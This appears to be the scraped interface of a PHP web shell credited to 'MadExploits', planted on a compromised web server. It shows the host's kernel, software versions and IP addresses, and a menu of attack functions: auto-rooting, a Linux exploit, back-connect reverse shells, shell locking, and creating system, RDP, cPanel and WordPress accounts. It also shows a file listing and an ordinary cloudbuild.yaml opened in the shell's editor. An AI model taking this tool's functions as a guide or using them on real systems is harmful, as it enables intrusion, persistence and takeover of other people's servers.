Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
memcache-4.0.5.2 /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
autom4te.cache
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
docker
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
php7
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
CREDITS
32
B
-rw-r--r--
Dockerfile
206
B
-rw-r--r--
LICENSE
3.13
KB
-rw-r--r--
Makefile
11.43
KB
-rw-r--r--
Makefile.fragments
0
B
-rw-r--r--
Makefile.objects
2.92
KB
-rw-r--r--
README
5.75
KB
-rw-r--r--
cloudbuild.yaml
1.55
KB
-rw-r--r--
config.h
1.74
KB
-rw-r--r--
config.h.in
1.65
KB
-rw-r--r--
config.log
19.16
KB
-rw-r--r--
config.m4
67
B
-rw-r--r--
config.nice
130
B
-rwxr-xr-x
config.status
20.81
KB
-rwxr-xr-x
config.w32
1.05
KB
-rw-r--r--
config9.m4
4.44
KB
-rw-r--r--
configure
443.73
KB
-rwxr-xr-x
configure.ac
4.96
KB
-rw-r--r--
example.php
509
B
-rw-r--r--
libtool
205.71
KB
-rwxr-xr-x
memcache.la
808
B
-rw-r--r--
memcache.php
28.38
KB
-rw-r--r--
run-tests.php
124.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cloudbuild.yaml
steps: - name: 'gcr.io/kaniko-project/executor:latest' args: [ 'build', '--build-arg', 'PHP_IMAGE=php:7.0-stretch', '--destination=gcr.io/$PROJECT_ID/build-7.0', '--cache=true', '--cache-ttl=6h', '.' ] waitFor: ['-'] id: 'build-7.0' - name: 'gcr.io/kaniko-project/executor:latest' args: [ 'build', '--build-arg', 'PHP_IMAGE=php:7.1-stretch', '--destination=gcr.io/$PROJECT_ID/build-7.1', '--cache=true', '--cache-ttl=6h', '.' ] waitFor: ['-'] id: 'build-7.1' - name: 'gcr.io/kaniko-project/executor:latest' args: [ 'build', '--build-arg', 'PHP_IMAGE=php:7.2-stretch', '--destination=gcr.io/$PROJECT_ID/build-7.2', '--cache=true', '--cache-ttl=6h', '.' ] waitFor: ['-'] id: 'build-7.2' - name: 'gcr.io/kaniko-project/executor:latest' args: [ 'build', '--build-arg', 'PHP_IMAGE=php:7.3-stretch', '--destination=gcr.io/$PROJECT_ID/build-7.3', '--cache=true', '--cache-ttl=6h', '.' ] waitFor: ['-'] id: 'build-7.3' - name: 'gcr.io/cloud-builders/docker' args: ['run', 'gcr.io/$PROJECT_ID/build-7.0'] waitFor: ['build-7.0'] id: 'run-7.0' - name: 'gcr.io/cloud-builders/docker' args: ['run', 'gcr.io/$PROJECT_ID/build-7.1'] waitFor: ['build-7.1'] id: 'run-7.1' - name: 'gcr.io/cloud-builders/docker' args: ['run', 'gcr.io/$PROJECT_ID/build-7.2'] waitFor: ['build-7.2'] id: 'run-7.2' - name: 'gcr.io/cloud-builders/docker' args: ['run', 'gcr.io/$PROJECT_ID/build-7.3'] waitFor: ['build-7.3'] id: 'run-7.3' images: [ 'gcr.io/$PROJECT_ID/build-7.0', 'gcr.io/$PROJECT_ID/build-7.1', 'gcr.io/$PROJECT_ID/build-7.2', 'gcr.io/$PROJECT_ID/build-7.3' ]
Close